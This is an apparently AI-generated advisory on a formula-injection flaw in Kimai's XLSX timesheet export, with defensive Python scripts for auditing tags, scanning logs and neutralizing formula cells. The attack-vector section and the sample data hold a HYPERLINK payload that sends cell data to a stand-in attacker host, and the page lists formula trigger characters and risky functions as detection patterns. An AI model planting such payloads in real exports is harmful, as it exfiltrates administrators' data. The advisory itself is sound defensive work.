CVE-2026-42267 Overview
CVE-2026-42267 is a formula injection vulnerability in Kimai, an open-source time tracking application. The flaw affects versions from 2.27.0 up to, but not including, 2.54.0. Any authenticated user with ROLE_USER can create a tag whose name begins with = via POST /api/tags and then attach it to a timesheet. When an administrator exports timesheets to XLSX, the malicious tag name is written as a spreadsheet formula and evaluated when the file is opened in Excel. The issue is classified under [CWE-1236] Improper Neutralization of Formula Elements in a CSV File.
Critical Impact
A low-privileged Kimai user can inject spreadsheet formulas that execute in an administrator's Excel session when an XLSX export is opened, opening paths to data exfiltration or client-side code execution.
Affected Products
- Kimai versions 2.27.0 through 2.53.x
- Kimai self-hosted deployments exposing the /api/tags endpoint
- Any Kimai instance whose administrators export timesheets to XLSX
Discovery Timeline
- 2026-05-08 - CVE-2026-42267 published to NVD
- 2026-05-13 - Last updated in NVD database
- Kimai version 2.54.0 released with the fix
Technical Details for CVE-2026-42267
Vulnerability Analysis
The vulnerability resides in the XLSX export pipeline for timesheets. When an administrator triggers an export, Kimai's ArrayFormatter.formatValue() joins all tag names assigned to a timesheet using PHP's implode() and returns the concatenated string without sanitization. The downstream OpenSpout library inspects each cell value during XLSX serialization. Strings beginning with = are promoted to a FormulaCell and written into the workbook XML as <f>...</f> elements. Excel evaluates these formula nodes when the file opens, treating attacker-controlled tag data as executable spreadsheet logic.
Formula injection in spreadsheet exports extends beyond benign arithmetic. Adversaries can craft payloads that invoke HYPERLINK, DDE, WEBSERVICE, or external command primitives depending on the victim's Excel version and macro settings. Exfiltration of cell contents to attacker-controlled hosts is achievable without macros.
Root Cause
Kimai trusts user-supplied tag names as plain text throughout its data model. The export code path does not neutralize leading =, +, -, @, or tab characters before passing values to OpenSpout. Because OpenSpout interprets the leading = as a directive to create a formula cell, the tag name becomes an active formula in the exported workbook.
Attack Vector
A user holding the default ROLE_USER role sends a POST /api/tags request with a payload such as {"name":"=HYPERLINK(\"https://attacker.example/?d=\"&A1,\"click\")"} and then assigns the resulting tag to one of their own timesheet entries. The next time an administrator exports timesheets to XLSX and opens the file, Excel evaluates the formula in the administrator's session context. Exploitation therefore requires user interaction: the victim administrator must open the exported file. See the GitHub Security Advisory GHSA-3xc2-h5r3-wv3r for additional technical detail.
Detection Methods for CVE-2026-42267
Indicators of Compromise
- Tag records in the Kimai database whose name column begins with =, +, -, @, or a tab character.
- POST /api/tags requests in web server logs containing JSON bodies with formula-prefixed name values.
- Exported XLSX files containing <f> elements within xl/worksheets/sheet*.xml that reference functions such as HYPERLINK, WEBSERVICE, IMPORTDATA, or DDE.
Detection Strategies
- Query the kimai2_tags table for name LIKE '=%' OR name LIKE '+%' OR name LIKE '-%' OR name LIKE '@%' to surface injected tags.
- Inspect API access logs for POST /api/tags calls originating from non-administrative accounts that include formula characters in the request body.
- Unzip recent XLSX exports and grep sheet XML for <f> formula nodes that originated from tag columns.
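The database audit and API log review above, as an added example that is neither Kimai's code nor part of the advisory: the trigger-character check separates the = prefix, which OpenSpout promotes to a formula cell, from the other prefixes that need human review, and the log parser assumes a constructed line format because stock web server logs do not record POST bodies.

```python
import json
import re
from typing import Iterable

# Leading characters spreadsheets treat as a formula trigger: the page's list plus CR, which OWASP also lists.
TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def formula_trigger(name: str):
    """Return the trigger character a tag name starts with, or None."""
    return name[0] if name and name[0] in TRIGGERS else None

def audit_tags(rows: Iterable[tuple]) -> list:
    """rows are (id, name) pairs as read from kimai2_tags. Findings come back worst-first:
    '=' is the prefix OpenSpout promotes to a formula cell, so it is 'high'; the other prefixes are
    'review' because tags such as '-urgent' or '+1' are common and usually legitimate."""
    findings = []
    for tag_id, name in rows:
        trig = formula_trigger(name)
        if trig is not None:
            findings.append({"id": tag_id, "name": name, "trigger": repr(trig),
                             "severity": "high" if trig == "=" else "review"})
    return sorted(findings, key=lambda f: f["severity"] != "high")

# Assumed log shape (constructed): web servers do not log POST bodies by default, so this expects a
# proxy or application log that records them; adapt LOG_RE to the format you actually have.
LOG_RE = re.compile(r'(?P<ts>\S+) user=(?P<user>\S+) "POST /api/tags" (?P<status>\d{3}) body=(?P<body>\{.*\})$')

def suspicious_tag_requests(lines: Iterable[str]) -> list:
    """Return (timestamp, user, name) for successful POST /api/tags calls whose name starts with a trigger."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        try:
            body = json.loads(m["body"])
        except ValueError:
            continue
        name = body.get("name", "") if isinstance(body, dict) else ""
        if m["status"].startswith("2") and formula_trigger(name):
            hits.append((m["ts"], m["user"], name))
    return hits

# Constructed samples: three rows from kimai2_tags and three log lines in the assumed format.
SAMPLE_ROWS = [(1, "billable"), (2, '=HYPERLINK("https://attacker.example/?d="&A1,"click")'), (3, "-urgent")]
SAMPLE_LOG = [
    '2026-05-09T09:12:01Z user=alice "POST /api/tags" 201 body={"name":"billable"}',
    '2026-05-09T09:13:44Z user=bob "POST /api/tags" 201 body={"name":"=1+1"}',
    '2026-05-09T09:14:02Z user=bob "POST /api/tags" 403 body={"name":"@SUM(A1)"}',
]
```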
Monitoring Recommendations
- Alert on the creation of any tag whose name starts with a spreadsheet formula trigger character.
- Monitor administrator workstations for Excel processes spawning network connections or child processes shortly after opening Kimai exports.
- Track Kimai application version across hosts and flag any instance running 2.27.0 through 2.53.x.
How to Mitigate CVE-2026-42267
Immediate Actions Required
- Upgrade Kimai to version 2.54.0 or later on every deployment.
- Audit the kimai2_tags table for existing tags whose names begin with formula trigger characters and remove or rename them.
- Re-issue any XLSX timesheet exports generated since 2.27.0 was deployed, as previously distributed files may contain live formulas.
Patch Information
The maintainers fixed the issue in Kimai 2.54.0. The release notes and patched code are available at the Kimai 2.54.0 GitHub Release. The vendor advisory is published as GHSA-3xc2-h5r3-wv3r.
Workarounds
- Until the upgrade is complete, restrict tag creation to trusted administrative roles by tightening the API permissions on /api/tags.
- Instruct administrators to open exported XLSX files in Protected View and to decline any prompts to enable formulas, external content, or DDE.
- Post-process exports through a script that prefixes cells starting with =, +, -, @, or tab with a single quote to neutralize formula evaluation.
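As an added example (not Kimai's or OpenSpout's code) that covers both the sheet-XML inspection in the detection section and the post-processing workaround above: it walks every worksheet part of an XLSX, reports each <f> cell and whether it names a function from the indicator list, and rewrites the cell as an inline string carrying a literal quote prefix. The fixture workbook and its cell values are constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
ET.register_namespace("", NS)
# Functions that reach outside the workbook (the page's list); a '|' inside a formula is the DDE link separator.
RISKY = re.compile(r"\b(HYPERLINK|WEBSERVICE|IMPORTDATA|DDE)\b|\|", re.I)

def scan_and_neutralize(xlsx_bytes: bytes):
    """Return (findings, cleaned): (part, ref, formula, risky) per formula cell, and the workbook with those cells rewritten as inline strings."""
    findings, out = [], io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zin, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if re.fullmatch(r"xl/worksheets/sheet\d+\.xml", item.filename):
                root = ET.fromstring(data)
                for cell in list(root.iter(f"{{{NS}}}c")):
                    f = cell.find(f"{{{NS}}}f")
                    if f is None:
                        continue
                    formula = f.text or ""
                    findings.append((item.filename, cell.get("r"), formula, bool(RISKY.search(formula))))
                    for child in list(cell):      # drop <f> and the cached <v>
                        cell.remove(child)
                    cell.set("t", "inlineStr")    # style attribute stays, cell type becomes text
                    t = ET.SubElement(ET.SubElement(cell, f"{{{NS}}}is"), f"{{{NS}}}t")
                    t.text = "'=" + formula       # literal quote prefix keeps it inert if re-exported as CSV
                data = ET.tostring(root, encoding="UTF-8", xml_declaration=True)
            zout.writestr(item, data)             # every other part is copied through unchanged
    return findings, out.getvalue()

def read_part(xlsx_bytes: bytes, name: str) -> str:
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        return z.read(name).decode("utf-8")

# Constructed fixture: one worksheet shaped like OpenSpout output (real exports carry more parts, which pass through untouched).
SAMPLE_SHEET = f"""<worksheet xmlns="{NS}"><sheetData><row r="1">
<c r="A1" t="inlineStr"><is><t>2026-05-01</t></is></c>
<c r="B1" s="1"><f>HYPERLINK("https://attacker.example/?d="&amp;A1,"click")</f><v>click</v></c>
<c r="C1"><f>SUM(1,2)</f><v>3</v></c>
</row></sheetData></worksheet>"""

def build_sample_xlsx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/worksheets/sheet1.xml", SAMPLE_SHEET)
    return buf.getvalue()
```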
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.